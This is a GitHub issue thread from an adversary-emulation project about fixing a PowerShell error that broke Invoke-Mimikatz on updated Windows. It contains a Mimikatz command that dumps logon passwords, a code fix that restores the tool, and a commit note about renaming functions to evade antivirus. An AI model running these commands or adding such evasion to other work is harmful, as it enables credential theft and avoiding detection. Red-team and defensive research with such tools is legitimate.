
Error when Running Mimikatz #38

Closed
aktibista opened this issue May 25, 2018 · 7 comments

Comments

@aktibista

aktibista commented May 25, 2018

Hostname: win8
Command Line: powershell -command -
StdIn: [[powerkatz]] Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonPasswords exit"
StdOut:
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:6

+     $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
@dm-mitre
Contributor

This seems like a bug in PowerShell MimiKatz. We may need to upgrade the version.

@CG-root

CG-root commented Jun 10, 2018

It seems that the issue starts from Windows 10 latest major update in April (Version 1803).

@CG-root

CG-root commented Jun 10, 2018

I think I have solved it.

Change the following line:
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')

To

$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);

Let me know if this solves the issue

@aktibista
Author

I confirm that the solution works!

@unkempthenry
Contributor

Unsure if the above script change only works on Windows 8.1 and not 10 (see #47). We should probably update PowerSploit and mimikatz across the board.

@wyncollier

CG-Root is a God. I can verify that the fix works on line 886.

@unkempthenry
Contributor

0b2c9e0 uses the latest version of Invoke-Mimikatz from Empire, I believe that this should solve this problem for new installs. Thanks everyone for digging into this!

pwndad added a commit to pwndad/PowerSploit that referenced this issue Aug 31, 2018
Cobalt got the same "ambiguous" powershell issue, since they use your code:
https://blog.cobaltstrike.com/2018/05/24/powershell-shellcode-injection-on-win-10-v1803/

However, this genius fix from @CG-root for Invoke-Mimikatz solves the issue for Invoke-Shellcode as well:
mitre/caldera#38 (comment)
rtodora added a commit to rtodora/PowerSploit that referenced this issue Jan 28, 2019
Changed to work on patched win10 systems, line 886 from previous, per this post: mitre/caldera#38
gg-sec pushed a commit to gg-sec/update_invoke_mimikatz that referenced this issue Apr 6, 2020
breaktoprotect added a commit to breaktoprotect/stager that referenced this issue Oct 2, 2020
hkd3 added a commit to hkd3/Empire that referenced this issue Nov 13, 2020
hkd3 added a commit to hkd3/PowerSploit that referenced this issue Nov 13, 2020
dutragustavo added a commit to dutragustavo/PowerSploit that referenced this issue Jan 11, 2021
armysick added a commit to armysick/Empire that referenced this issue Jan 12, 2021
mp4383 pushed a commit to mp4383/Empire that referenced this issue Aug 6, 2021
ColeHouston added a commit to ColeHouston/PowerSploit that referenced this issue Jan 10, 2022
Used the fix for the ambiguous GetProcAddress match as given here: mitre/caldera#38
Also changed the function name in case that helps in avoiding any red flags from AV
jlangdev added a commit to jlangdev/EDRDemoTools that referenced this issue Jan 12, 2022
gfctam added a commit to gfctam/PowerSploit that referenced this issue May 22, 2022